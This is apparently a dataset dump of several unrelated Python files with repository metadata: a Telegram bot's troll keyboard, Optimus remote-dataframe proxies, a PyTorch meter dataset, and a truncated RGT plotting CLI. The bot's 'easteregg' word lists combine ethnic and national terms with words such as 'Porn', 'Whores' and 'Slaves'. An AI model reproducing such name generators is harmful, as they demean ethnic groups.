@track_activity('easteregg', '"crappy troll markup"')
def _crapPy_Tr0ll_kbmarkup(rows=None):
    """Build a troll reply keyboard of randomly generated fake channel names."""
    if rows is None:
        rows = 4
    adjectives = ['Gay', 'Pony', 'Dick', 'Telegram', 'Milk', 'WhatsApp', 'Daniils', 'T3CHNOs', 'Adult', 'ThirdWorld',
                  'Asian', 'Mexican', 'SM', 'Russian', 'Chinese', 'Gonzo', 'Anime']
    nouns = ['Tales', 'Porn', 'Rice', 'Bugs', 'Whores', 'Pigs', 'Alternatives', 'Pics', 'Penetrator', 'Addiction',
             'Ducks', 'Slaves']
    suffixes = ['Collection', 'Channel', 'Bot', 'Radio', 'Chat', 'Discuss ion', 'Conversation', 'Voting', 'ForPresident']

    def random_name():
        # Build both candidate spellings first, then pick one of them.
        spaced = '{} {} {}'.format(random.choice(adjectives), random.choice(nouns), random.choice(suffixes))
        handle = '@{}{}{}'.format(random.choice(adjectives), random.choice(nouns),
                                  ''.join(random.choice(suffixes).split(' ')))
        return random.choice([spaced, handle])

    # `rows` rows of two buttons each.
    return [[KeyboardButton(random_name()) for _ in range(2)] for _ in range(rows)]
def send_next(bot, update, args=None):
    """Send the troll "username generator" keyboard to the requesting user.

    An optional first command argument selects the number of keyboard rows.
    """
    uid = util.uid_from_update(update)
    rows = None
    if args:
        try:
            rows = int(args[0])
        except (ValueError, TypeError):
            # Non-numeric argument: fall back to the default row count.
            rows = None
    reply_markup = ReplyKeyboardMarkup(_crapPy_Tr0ll_kbmarkup(rows), one_time_keyboard=True, per_user=True)
    text = 'ɹoʇɐɹǝuǝb ǝɯɐuɹǝsn ɯɐɹbǝןǝʇ'
    util.send_md_message(bot, uid, text, reply_markup=reply_markup)
def send_random_bot(bot, update):
    """Reply with the details of one random approved bot that has a description."""
    from components.explore import send_bot_details
    # Peewee needs the explicit `== True` comparison to build the SQL predicate.
    random_bot = Bot.select().where(
        (Bot.approved == True), (Bot.description.is_null(False))
    ).order_by(fn.Random()).limit(1)[0]
    send_bot_details(bot, update, random_bot)
417d85f2f2634da06e6ff80737c0f455994abeac | 5,398 | py | Python | sets/generator/nopattern/remote.py | ignacio-gallego/tbcnn_skill_pill | 66c3939e2944160c864b61495ac4c7aaa56acd18 | [
"MIT"
] | null | null | null | sets/generator/nopattern/remote.py | ignacio-gallego/tbcnn_skill_pill | 66c3939e2944160c864b61495ac4c7aaa56acd18 | [
"MIT"
] | null | null | null | sets/generator/nopattern/remote.py | ignacio-gallego/tbcnn_skill_pill | 66c3939e2944160c864b61495ac4c7aaa56acd18 | [
"MIT"
] | null | null | null | from pandas import DataFrame as PandasDataFrame
from optimus.engines.base.basedataframe import BaseDataFrame
class RemoteDummyAttribute:
    """Proxy for an attribute chain on a remote variable.

    Each attribute access extends the chain locally; calling the proxy
    resolves the chain on the remote object and either invokes it (when
    callable) or returns its value.
    """

    def __init__(self, name, names, dummy_id, op):
        # Full attribute path accumulated so far, e.g. ["cols", "upper"].
        self.__names = [*names, name]
        self.__op = op
        self.__id = dummy_id

    def __getattr__(self, item):
        # Chain another attribute lookup without touching the remote side yet.
        return RemoteDummyAttribute(item, self.__names, self.__id, self.__op)

    def __call__(self, *args, **kwargs):
        # `client_submit` is an out-of-band flag for the proxy itself; always
        # remove it from kwargs so it is never forwarded to the remote method
        # (previously an explicit falsy value leaked through).
        client_submit = kwargs.pop("client_submit", False)

        def _f(op, unique_id, method, *args, **kwargs):
            obj = op.get_var(unique_id)
            if obj is None:
                op.del_var(unique_id)
                raise Exception("Remote variable with id " + unique_id + " not found or null")
            func = obj
            for me in method:
                func = getattr(func, me)
            # Plain attributes are returned as-is; callables are invoked.
            if callable(func):
                result = func(*args, **kwargs)
            else:
                result = func
            return result

        if client_submit:
            return self.__op.remote_submit(_f, self.__id, self.__names, *args, **kwargs)
        return self.__op.remote_run(_f, self.__id, self.__names, *args, **kwargs)
class RemoteDummyVariable:
    """Client-side handle for a variable stored on a remote engine.

    Unknown public attribute lookups produce `RemoteDummyAttribute` proxies
    that forward the access to the remote object identified by `self.id`.
    """

    def __init__(self, op, unique_id, *args, **kwargs):
        self.op = op
        self.id = unique_id

    def __getattr__(self, item):
        # Never proxy private/dunder names; that would break pickling and
        # other protocol lookups that probe for optional attributes.
        if item.startswith('_'):
            raise AttributeError(item)
        return RemoteDummyAttribute(item, [], self.id, self.op)

    def __getstate__(self):
        return {"op": self.op, "id": self.id}

    def __setstate__(self, d):
        # `__getstate__` returns a plain dict, so restore via key access.
        # (The previous attribute access `d.op` raised on every unpickle.)
        self.op = d["op"]
        self.id = d["id"]

    def __del__(self):
        # Best effort: ask the remote side to drop the variable. Errors in
        # __del__ must never propagate (e.g. during interpreter shutdown).
        try:
            self.op.remote.del_var(self.id).result(180)
        except Exception:
            pass
class RemoteDummyDataFrame(RemoteDummyVariable):
    """Remote dataframe handle with local rendering helpers.

    Display methods are borrowed from `BaseDataFrame`; everything else is
    proxied to the remote engine through `RemoteDummyVariable`.
    """

    # Reuse the local rendering implementations on the remote handle.
    print = BaseDataFrame.print
    table = BaseDataFrame.table
    display = BaseDataFrame.display

    def __repr__(self):
        # `ascii` resolves through __getattr__ and executes remotely.
        return self.ascii()

    def _repr_html_(self):
        return self.table()

    @property
    def meta(self):
        """Fetch the remote dataframe's `meta` attribute."""
        def _fetch(op, unique_id, attr):
            remote_df = op.get_var(unique_id)
            if remote_df is None:
                op.del_var(unique_id)
                raise Exception("Remote variable with id " + unique_id + " not found or null")
            return getattr(remote_df, attr)

        return self.op.remote_run(_fetch, self.id, "meta")
class ClientActor:
    """Server-side actor that owns an Optimus engine plus a variable store.

    Remote callbacks submitted through `submit` receive the `op` engine and
    read/write named variables via `get_var`/`set_var`.
    """

    # Class-level defaults for introspection; the real per-instance state is
    # created in __init__ so separate actors never share a variable store
    # (previously these mutable class attributes were shared by all instances).
    op = {}
    _vars = {}
    _del_next = []

    def __init__(self, engine=False):
        self._vars = {}
        self._del_next = []
        if not engine:
            from optimus.optimus import Engine
            engine = Engine.DASK.value
        from optimus import Optimus
        self.op = Optimus(engine)
        # Expose the variable store through the engine object itself so that
        # remote callbacks can reach it via `op`.
        self.op.set_var = self.set_var
        self.op.get_var = self.get_var
        self.op.del_var = self.del_var
        self.op.list_vars = self.list_vars
        self.op.update_vars = self.update_vars
        self.set_var("_load", self.op.load)
        self.set_var("_create", self.op.create)

    def list_vars(self):
        """Return the names of every stored variable."""
        return list(self._vars.keys())

    def update_vars(self, values):
        """Bulk-merge `values` (a dict) into the variable store."""
        self._vars.update(values)

    def _del_var(self, name):
        # Actually remove the variable; tolerate a missing name.
        try:
            del self._vars[name]
        except KeyError:
            print(name + " not found")

    def del_var(self, name):
        """Schedule `name` for deletion and flush previously scheduled names.

        Deletion is deferred by one call so a variable being dropped can still
        be referenced by an in-flight request.
        """
        for _name in self._del_next:
            self._del_var(_name)
        self._del_next = []
        # Names starting with "_" are internal and never deleted this way.
        if not name.startswith("_"):
            # .get avoids a KeyError for unknown names.
            if self._vars.get(name) is None:
                print(name + " not found")
            else:
                self._del_next.append(name)

    def set_var(self, name, value):
        """Store `value` under `name`."""
        self._vars[name] = value

    def get_var(self, name):
        """Return the variable called `name`, or None when absent."""
        return self._vars.get(name, None)

    def _return(self, value):
        # Convert a callback result into something safely serializable for the
        # client: plain scalars pass through, containers recurse, and any other
        # object is stored server-side and replaced by a dummy reference.
        import numpy as np
        try:
            import cupy as cp
            extra_scalar_types = (cp.generic,)
        except ImportError:
            # cupy is optional (GPU engines only); don't require it here.
            extra_scalar_types = ()
        if isinstance(value, (dict,)):
            for key in value:
                value[key] = self._return(value[key])
            return value
        elif isinstance(value, (list,)):
            return list(map(self._return, value))
        elif isinstance(value, (set,)):
            return set(map(self._return, value))
        elif isinstance(value, (tuple,)):
            return tuple(map(self._return, value))
        elif isinstance(value, (PandasDataFrame,)):
            # Plain pandas frames are summarized instead of proxied.
            return value.head()
        elif not isinstance(
                value,
                (str, bool, int, float, complex, np.generic) + extra_scalar_types) and value is not None:
            import uuid
            unique_id = str(uuid.uuid4())
            self.set_var(unique_id, value)
            if isinstance(value, (BaseDataFrame,)):
                return {"dummy": unique_id, "dataframe": True}
            else:
                return {"dummy": unique_id, "dataframe": False}
        else:
            return value

    def submit(self, callback, *args, **kwargs):
        """Run `callback(op, *args, **kwargs)` and package its result.

        Exceptions are caught at this boundary and returned as an error
        payload instead of propagating to the transport layer.
        """
        try:
            result = callback(self.op, *args, **kwargs)
        except Exception as err:
            import traceback
            error_class = err.__class__.__name__
            # Some exceptions carry no args; fall back to str(err).
            detail = err.args[0] if err.args else str(err)
            tb = traceback.format_exc()
            error = "%s: %s\n%s" % (error_class, detail, tb)
            return {"status": "error", "error": error}
        return self._return(result) if result is not None else None
| 30.156425 | 115 | 0.567803 | 646 | 5,398 | 4.490712 | 0.190402 | 0.041365 | 0.018959 | 0.034471 | 0.235436 | 0.122372 | 0.109962 | 0.053775 | 0.053775 | 0.053775 | 0 | 0.001372 | 0.32475 | 5,398 | 178 | 116 | 30.325843 | 0.794513 | 0 | 0 | 0.128571 | 0 | 0 | 0.040571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157143 | false | 0 | 0.057143 | 0.042857 | 0.45 | 0.021429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
417e3d6a00fec073fc8e5b110ada2e2d5309582c | 1,919 | py | Python | app/util/ML/dataset.py | SoftwareEngineerUB/SmartEnergy | 8893728eaf989a3b8bd2c1b3a8a1a5e6c4ce9c10 | [
"Apache-2.0"
] | null | null | null | app/util/ML/dataset.py | SoftwareEngineerUB/SmartEnergy | 8893728eaf989a3b8bd2c1b3a8a1a5e6c4ce9c10 | [
"Apache-2.0"
] | null | null | null | app/util/ML/dataset.py | SoftwareEngineerUB/SmartEnergy | 8893728eaf989a3b8bd2c1b3a8a1a5e6c4ce9c10 | [
"Apache-2.0"
] | null | null | null | import torch as T
import numpy as np
from app.util.ML.constants import *
DEVICE = T.device("cpu")
GPU_ENABLED = False
class DeviceMeterDataset(T.utils.data.Dataset):
    """Torch dataset over an (N, 4) meter array.

    Columns 0-2 are the input features; column 3 is the target reading,
    scaled in place by ``mul_factor``.
    """

    @staticmethod
    def createDatasets(device_id, mul_factor=1):
        """Load the device's .npy dump, shuffle it, and split it into
        train / validation / test datasets (returned as a dict)."""
        source = BASE_PATH + TRAIN_FOLDER + DEVICE_BASE_NAME + str(device_id) + ".npy"
        raw = np.load(source)
        total = raw.shape[0]
        # cap the split sizes for very large dumps
        train_size = min(total // 2, 50000)
        eval_size = min(int(total * 2 / 10), 8000)
        np.random.shuffle(raw)
        train_part = raw[:train_size]
        valid_part = raw[train_size:train_size + eval_size]
        test_part = raw[train_size + eval_size:train_size + 2 * eval_size]
        return {
            "train": DeviceMeterDataset(train_part, mul_factor),
            "validation": DeviceMeterDataset(valid_part, mul_factor),
            "test": DeviceMeterDataset(test_part, mul_factor),
        }

    # we need to generate a mean error as a comparison basis for anomaly detection
    @staticmethod
    def createEvalData(device_id, mul_factor=1):
        """Sample up to 1000 random 12-row windows from the device's data,
        each copied out with its target column scaled by ``mul_factor``."""
        source = BASE_PATH + TRAIN_FOLDER + DEVICE_BASE_NAME + str(device_id) + ".npy"
        raw = np.load(source)
        starts = np.random.choice(raw.shape[0], 1000, replace=False)
        # drop start points whose 12-row window would run past the end
        starts = starts[starts < raw.shape[0] - 12]
        windows = [raw[start:start + 12, :].copy() for start in starts]
        for window in windows:
            window[:, 3] *= mul_factor
        return windows

    def __init__(self, data, mul_factor=1):
        # NOTE: scales column 3 of *data* in place before tensor conversion
        self.allData = data
        self.allData[:, 3] *= mul_factor
        self.xy_data = T.tensor(self.allData, dtype=T.float32).to(DEVICE)

    def __len__(self):
        return len(self.xy_data)

    def __getitem__(self, idx):
        # features are the first three columns; target is column 3 as a (1,) tensor
        features = self.xy_data[idx, :3]
        target = self.xy_data[idx, 3].reshape((1))
        return features, target
| 31.983333 | 112 | 0.625847 | 244 | 1,919 | 4.709016 | 0.368852 | 0.062663 | 0.034813 | 0.086162 | 0.160139 | 0.13577 | 0.13577 | 0.13577 | 0.13577 | 0.13577 | 0 | 0.024788 | 0.2642 | 1,919 | 59 | 113 | 32.525424 | 0.788952 | 0.042209 | 0 | 0.095238 | 0 | 0 | 0.016349 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.119048 | false | 0 | 0.071429 | 0.02381 | 0.309524 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
417fc0767f9f3045bfabe98057d3d6ae8df77d25 | 59,087 | py | Python | src/rgt/viz/Main.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | src/rgt/viz/Main.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | src/rgt/viz/Main.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | # Python Libraries
from __future__ import division
from __future__ import print_function
import os
import sys
import time
import getpass
import argparse
import datetime
import matplotlib
matplotlib.use('Agg', warn=False)
from .boxplot import Boxplot
from .lineplot import Lineplot
from .jaccard_test import Jaccard
from .projection_test import Projection
from .intersection_test import Intersect
from .bed_profile import BedProfile
from .shared_function import check_dir, print2, output_parameters, \
copy_em, list_all_index, output
from .plotTools import Venn
from .. import __version__
current_dir = os.getcwd()
"""
Statistical analysis methods and plotting tools for ExperimentalMatrix
Author: Joseph C.C. Kuo
"""
def main():
###############################################################################
##### PARAMETERS ##############################################################
###############################################################################
# Some general help descriptions
######### Some general plotting arguments descriptions ###############
helpinput = 'The file name of the input Experimental Matrix file. Recommended to add more columns for more information for ploting. For example, cell type or factors. (default: %(default)s)'
helpoutput = 'The directory name for the output files. For example, project name. (default: %(default)s)'
helptitle = 'The title shown on the top of the plot and also the folder name. (default: %(default)s)'
helpgroup = "Group the data by reads(needs 'factor' column), regions(needs 'factor' column), another name of column (for example, 'cell')in the header of experimental matrix, or None. (default: %(default)s)"
helpgroupbb = "Group the data by any optional column (for example, 'cell') of experimental matrix, or None. (default: %(default)s)"
helpsort = "Sort the data by reads(needs 'factor' column), regions(needs 'factor' column), another name of column (for example, 'cell')in the header of experimental matrix, or None. (default: %(default)s)"
helpcolor = "Color the data by reads(needs 'factor' column), regions(needs 'factor' column), another name of column (for example, 'cell')in the header of experimental matrix, or None. (default: %(default)s)"
helpcolorbb = "Color the data by any optional column (for example, 'cell') of experimental matrix, or None. (default: %(default)s)"
help_define_color = 'Define the specific colors with the given column "color" in experimental matrix. The color should be in the format of matplotlib.colors. For example, "r" for red, "b" for blue, or "(100, 35, 138)" for RGB. (default: %(default)s)'
helpreference = 'The file name of the reference Experimental Matrix. Multiple references are acceptable. (default: %(default)s)'
helpquery = 'The file name of the query Experimental Matrix. Multiple queries are acceptable. (default: %(default)s)'
helpcol = "Group the data in columns by reads(needs 'factor' column), regions(needs 'factor' column), another name of column (for example, 'cell')in the header of experimental matrix, or None. (default: %(default)s)"
helprow = "Group the data in rows by reads(needs 'factor' column), regions(needs 'factor' column), another name of column (for example, 'cell')in the header of experimental matrix, or None. (default: %(default)s)"
helpmp = "Define the number of cores for parallel computation. (default: %(default)s)"
version_message = "viz - Regulatory Analysis Toolbox (RGT). Version: " + str(__version__)
parser = argparse.ArgumentParser(description='Provides various Statistical analysis methods and plotting tools for ExperimentalMatrix.\
\nAuthor: Joseph C.C. Kuo, Ivan Gesteira Costa Filho', formatter_class=argparse.ArgumentDefaultsHelpFormatter,
add_help=True, version=version_message)
subparsers = parser.add_subparsers(help='sub-command help', dest='mode')
################### BED profile ##########################################
parser_bedprofile = subparsers.add_parser('bed_profile',
help='BED profile analyzes the given BED file(s) by their length, distribution and composition of the sequences.')
parser_bedprofile.add_argument('-i', metavar=' ',
help="Input experimental matrix or Input BED file or Input directory which contains BED files")
parser_bedprofile.add_argument('-o', metavar=' ', help=helpoutput)
parser_bedprofile.add_argument('-t', metavar=' ', default='bed_profile', help=helptitle)
parser_bedprofile.add_argument('-organism', metavar=' ', default=None,
help='Define the organism. (default: %(default)s)')
parser_bedprofile.add_argument('-biotype', metavar=' ', default=False,
help='Define the directory for biotype BED files.')
parser_bedprofile.add_argument('-repeats', metavar=' ', default=False,
help='Define the directory for repeats BED files.')
parser_bedprofile.add_argument('-genposi', metavar=' ', default=False,
help='Define the directory for the generic position BED files. (exons, introns, and intergenic regions)')
parser_bedprofile.add_argument('-labels', metavar=' ', default=None, help='Define the labels for more BED sets')
parser_bedprofile.add_argument('-sources', metavar=' ', default=None,
help='Define the directories for more BED sets corresponding to the labels')
parser_bedprofile.add_argument('-strand', metavar=' ', default=None,
help='Define whether to perform strand-specific comparison for each reference corresponding to the labels (T or F)')
parser_bedprofile.add_argument('-other', metavar=' ', default=None,
help='Define whether to count "else" for each reference corresponding to the labels (T or F)')
parser_bedprofile.add_argument('-background', metavar=' ', default=None,
help='Add the background to the first row of the figures (T or F)')
parser_bedprofile.add_argument('-coverage', action="store_true", default=False,
help='Calculate the overlapping region by coverage in bp instead of simple counting')
parser_bedprofile.add_argument('-test', action="store_true", default=False,
help='test script')
################### Projection test ##########################################
parser_projection = subparsers.add_parser('projection',
help='Projection test evaluates the association level by comparing to the random binomial model.')
parser_projection.add_argument('-r', metavar=' ', help=helpreference)
parser_projection.add_argument('-q', metavar=' ', help=helpquery)
parser_projection.add_argument('-o', metavar=' ', help=helpoutput)
parser_projection.add_argument('-t', metavar=' ', default='projection_test', help=helptitle)
parser_projection.add_argument('-g', metavar=' ', default=None, help=helpgroupbb)
parser_projection.add_argument('-c', metavar=' ', default="regions", help=helpcolorbb)
parser_projection.add_argument('-bg', metavar=' ', type=str, default=None,
help="Define a BED file as background. If not defined, the background is whole genome according to the given organism. (default: %(default)s)")
parser_projection.add_argument('-union', action="store_true",
help='Take the union of references as background for binominal test. (default: %(default)s)')
parser_projection.add_argument('-organism', metavar=' ', default='hg19',
help='Define the organism. (default: %(default)s)')
parser_projection.add_argument('-log', action="store_true",
help='Set y axis of the plot in log scale. (default: %(default)s)')
parser_projection.add_argument('-color', action="store_true", help=help_define_color)
parser_projection.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_projection.add_argument('-table', action="store_true",
help='Store the tables of the figure in text format. (default: %(default)s)')
parser_projection.add_argument('-bed', action="store_true", default=False,
help='Output BED files for the regions of query which overlap the reference. (default: %(default)s)')
parser_projection.add_argument('-pw', metavar=' ', type=int, default=5,
help='Define the width of single panel. (default: %(default)s)')
parser_projection.add_argument('-ph', metavar=' ', type=int, default=3,
help='Define the height of single panel. (default: %(default)s)')
parser_projection.add_argument('-cfp', metavar=' ', type=float, default=0,
help='Define the cutoff of the proportion. (default: %(default)s)')
parser_projection.add_argument('-load', action="store_false", default=True,
help='Load the BED files later during processing, which saves memory usage when dealing with large number of BED files.')
################### Intersect Test ##########################################
parser_intersect = subparsers.add_parser('intersect',
help='Intersection test provides various modes of intersection to test the association between references and queries.')
parser_intersect.add_argument('-r', metavar=' ', help=helpreference)
parser_intersect.add_argument('-q', metavar=' ', help=helpquery)
parser_intersect.add_argument('-o', help=helpoutput)
parser_intersect.add_argument('-t', metavar=' ', default='intersection_test', help=helptitle)
parser_intersect.add_argument('-g', metavar=' ', default=None, help=helpgroupbb)
parser_intersect.add_argument('-c', metavar=' ', default="regions", help=helpcolorbb)
parser_intersect.add_argument('-organism', metavar=' ', default='hg19',
help='Define the organism. (default: %(default)s)')
parser_intersect.add_argument('-bg', metavar=' ',
help="Define a BED file as background. If not defined, the background is whole genome according to the given organism. (default: %(default)s)")
parser_intersect.add_argument('-m', metavar=' ', default="count", choices=['count', 'bp'],
help="Define the mode of calculating intersection. 'count' outputs the number of overlapped regions.'bp' outputs the coverage(basepair) of intersection. (default: %(default)s)")
parser_intersect.add_argument('-tc', metavar=' ', type=int, default=False,
help="Define the threshold(in percentage) of reference length for intersection counting. For example, '20' means that the query which overlaps more than 20%% of reference is counted as intersection. (default: %(default)s)")
parser_intersect.add_argument('-ex', metavar=' ', type=int, default=0,
help="Define the extension(in bp) of reference length for intersection counting. For example, '20' means that each region of reference is extended by 20 bp in order to include proximal queries. (default: %(default)s)")
parser_intersect.add_argument('-log', action="store_true", help='Set y axis of the plot in log scale.')
parser_intersect.add_argument('-color', action="store_true", help=help_define_color)
parser_intersect.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_intersect.add_argument('-stest', metavar=' ', type=int, default=0,
help='Define the repetition time of random subregion test between reference and query. (default: %(default)s)')
parser_intersect.add_argument('-mp', metavar=' ', default=4, type=int, help=helpmp)
parser_intersect.add_argument('-pw', metavar=' ', type=int, default=3,
help='Define the width of single panel. (default: %(default)s)')
parser_intersect.add_argument('-ph', metavar=' ', type=int, default=3,
help='Define the height of single panel. (default: %(default)s)')
################### Jaccard test ##########################################
parser_jaccard = subparsers.add_parser('jaccard',
help='Jaccard test evaluates the association level by comparing with jaccard index from repeating randomization.')
parser_jaccard.add_argument('-o', help=helpoutput)
parser_jaccard.add_argument('-r', metavar=' ', help=helpreference)
parser_jaccard.add_argument('-q', metavar=' ', help=helpquery)
parser_jaccard.add_argument('-t', metavar=' ', default='jaccard_test', help=helptitle)
parser_jaccard.add_argument('-rt', metavar=' ', type=int, default=500,
help='Define how many times to run the randomization. (default: %(default)s)')
parser_jaccard.add_argument('-g', default=None, help=helpgroupbb)
parser_jaccard.add_argument('-c', default="regions", help=helpcolorbb)
parser_jaccard.add_argument('-organism', default='hg19', help='Define the organism. (default: %(default)s)')
parser_jaccard.add_argument('-nlog', action="store_false",
help='Set y axis of the plot not in log scale. (default: %(default)s)')
parser_jaccard.add_argument('-color', action="store_true", help=help_define_color)
parser_jaccard.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_jaccard.add_argument('-table', action="store_true",
help='Store the tables of the figure in text format. (default: %(default)s)')
parser_jaccard.add_argument('-pw', metavar=' ', type=int, default=3,
help='Define the width of single panel. (default: %(default)s)')
parser_jaccard.add_argument('-ph', metavar=' ', type=int, default=3,
help='Define the height of single panel. (default: %(default)s)')
################### Combinatorial Test ##########################################
parser_combinatorial = subparsers.add_parser('combinatorial',
help='Combinatorial test compare all combinatorial possibilities from reference to test the association between references and queries.')
parser_combinatorial.add_argument('-o', help=helpoutput)
parser_combinatorial.add_argument('-r', metavar=' ', help=helpreference)
parser_combinatorial.add_argument('-q', metavar=' ', help=helpquery)
parser_combinatorial.add_argument('-t', metavar=' ', default='combinatorial_test', help=helptitle)
parser_combinatorial.add_argument('-g', default=None, help=helpgroupbb)
parser_combinatorial.add_argument('-c', default="regions", help=helpcolorbb)
parser_combinatorial.add_argument('-organism', default='hg19', help='Define the organism. (default: %(default)s)')
parser_combinatorial.add_argument('-bg',
help="Define a BED file as background. If not defined, the background is whole genome according to the given organism. (default: %(default)s)")
parser_combinatorial.add_argument('-m', default="count", choices=['count', 'bp'],
help="Define the mode of calculating intersection. 'count' outputs the number of overlapped regions.'bp' outputs the coverage(basepair) of intersection. (default: %(default)s)")
parser_combinatorial.add_argument('-tc', type=int, default=False,
help="Define the threshold(in percentage) of reference length for intersection counting. For example, '20' means that the query which overlaps more than 20%% of reference is counted as intersection. (default: %(default)s)")
parser_combinatorial.add_argument('-ex', type=int, default=0,
help="Define the extension(in percentage) of reference length for intersection counting. For example, '20' means that each region of reference is extended by 20%% in order to include proximal queries. (default: %(default)s)")
parser_combinatorial.add_argument('-log', action="store_true",
help='Set y axis of the plot in log scale. (default: %(default)s)')
parser_combinatorial.add_argument('-color', action="store_true", help=help_define_color)
parser_combinatorial.add_argument('-venn', action="store_true",
help='Show the Venn diagram of the combinatorials of references. (default: %(default)s)')
parser_combinatorial.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_combinatorial.add_argument('-stest', type=int, default=0,
help='Define the repetition time of random subregion test between reference and query. (default: %(default)s)')
parser_combinatorial.add_argument('-pw', metavar=' ', type=int, default=3,
help='Define the width of single panel. (default: %(default)s)')
parser_combinatorial.add_argument('-ph', metavar=' ', type=int, default=3,
help='Define the height of single panel. (default: %(default)s)')
################### Boxplot ##########################################
parser_boxplot = subparsers.add_parser('boxplot',
help='Boxplot based on the BAM and BED files for gene association analysis.')
parser_boxplot.add_argument('input', help=helpinput)
parser_boxplot.add_argument('-o', metavar=' ', help=helpoutput)
parser_boxplot.add_argument('-t', metavar=' ', default='boxplot', help=helptitle)
parser_boxplot.add_argument('-g', metavar=' ', default='reads', help=helpgroup)
parser_boxplot.add_argument('-c', metavar=' ', default='regions', help=helpcolor)
parser_boxplot.add_argument('-s', metavar=' ', default='None', help=helpsort)
parser_boxplot.add_argument('-scol', action="store_true", help="Share y axis among columns. (default: %(default)s)")
parser_boxplot.add_argument('-nlog', action="store_false",
help='Set y axis of the plot not in log scale. (default: %(default)s)')
parser_boxplot.add_argument('-color', action="store_true", help=help_define_color)
parser_boxplot.add_argument('-pw', metavar=' ', type=int, default=3,
help='Define the width of single panel. (default: %(default)s)')
parser_boxplot.add_argument('-ph', metavar=' ', type=int, default=3,
help='Define the height of single panel. (default: %(default)s)')
parser_boxplot.add_argument('-nqn', action="store_true",
help='No quantile normalization in calculation. (default: %(default)s)')
parser_boxplot.add_argument('-df', action="store_true",
help="Show the difference of the two signals which share the same labels.The result is the subtraction of the first to the second. (default: %(default)s)")
parser_boxplot.add_argument('-ylim', metavar=' ', type=int, default=None,
help="Define the limit of y axis. (default: %(default)s)")
parser_boxplot.add_argument('-p', metavar=' ', type=float, default=0.05,
help='Define the significance level for multiple test. (default: %(default)s)')
parser_boxplot.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_boxplot.add_argument('-table', action="store_true",
help='Store the tables of the figure in text format. (default: %(default)s)')
################### Lineplot ##########################################
parser_lineplot = subparsers.add_parser('lineplot', help='Generate lineplot with various modes.')
choice_center = ['midpoint', 'bothends', 'upstream', 'downstream']
# Be consist as the arguments of GenomicRegionSet.relocate_regions
parser_lineplot.add_argument('input', help=helpinput)
parser_lineplot.add_argument('-o', help=helpoutput)
parser_lineplot.add_argument('-ga', action="store_true",
help="Use genetic annotation data as input regions (e.g. TSS, TTS, exons and introns) instead of the BED files in the input matrix.")
parser_lineplot.add_argument('-t', metavar=' ', default='lineplot', help=helptitle)
parser_lineplot.add_argument('-center', metavar=' ', choices=choice_center, default='midpoint',
help='Define the center to calculate coverage on the regions. Options are: ' + ', '.join(
choice_center) + '. (default: %(default)s) The bothend mode will flap the right end region for calculation.')
parser_lineplot.add_argument('-g', metavar=' ', default='None', help=helpgroup)
parser_lineplot.add_argument('-row', metavar=' ', default='None', help=helprow)
parser_lineplot.add_argument('-col', metavar=' ', default='regions', help=helpcol)
parser_lineplot.add_argument('-c', metavar=' ', default='reads', help=helpcolor)
parser_lineplot.add_argument('-e', metavar=' ', type=int, default=2000,
help='Define the extend length of interested region for plotting. (default: %(default)s)')
parser_lineplot.add_argument('-rs', metavar=' ', type=int, default=200,
help='Define the readsize for calculating coverage. (default: %(default)s)')
parser_lineplot.add_argument('-ss', metavar=' ', type=int, default=50,
help='Define the stepsize for calculating coverage. (default: %(default)s)')
parser_lineplot.add_argument('-bs', metavar=' ', type=int, default=100,
help='Define the binsize for calculating coverage. (default: %(default)s)')
parser_lineplot.add_argument('-log', action="store_true",
help="Take log for the value before calculating average. (default: %(default)s)")
parser_lineplot.add_argument('-scol', action="store_true",
help="Share y axis among columns. (default: %(default)s)")
parser_lineplot.add_argument('-srow', action="store_true", help="Share y axis among rows. (default: %(default)s)")
parser_lineplot.add_argument('-organism', metavar=' ',
help='Define the organism. (default: %(default)s)')
parser_lineplot.add_argument('-color', action="store_true", help=help_define_color)
parser_lineplot.add_argument('-pw', metavar=' ', type=int, default=3,
help='Define the width of single panel. (default: %(default)s)')
parser_lineplot.add_argument('-ph', metavar=' ', type=int, default=3,
help='Define the height of single panel. (default: %(default)s)')
parser_lineplot.add_argument('-test', action="store_true",
help="Sample only the first 10 regions in all BED files for testing. (default: %(default)s)")
parser_lineplot.add_argument('-mp', metavar=' ', type=int, default=0,
help="Perform multiprocessing for faster computation. (default: %(default)s)")
parser_lineplot.add_argument('-df', action="store_true",
help="Show the difference of the two signals which share the same labels.The result is the subtraction of the first to the second. (default: %(default)s)")
parser_lineplot.add_argument('-dft', metavar=' ', default=None,
help="Add one more tag for calculating difference. (default: %(default)s)")
parser_lineplot.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_lineplot.add_argument('-table', action="store_true",
help='Store the tables of the figure in text format. (default: %(default)s)')
parser_lineplot.add_argument('-sense', action="store_true",
help='Set the plot sense-specific. (default: %(default)s)')
parser_lineplot.add_argument('-strand', action="store_true",
help='Set the plot strand-specific. (default: %(default)s)')
parser_lineplot.add_argument('-average', action="store_true",
help='Show only the average of the replicates. (default: %(default)s)')
parser_lineplot.add_argument('-flip_negative', action="store_true", default=False,
help='Flip the negative strand (default: %(default)s)')
parser_lineplot.add_argument('-extend_outside', action="store_true", default=False,
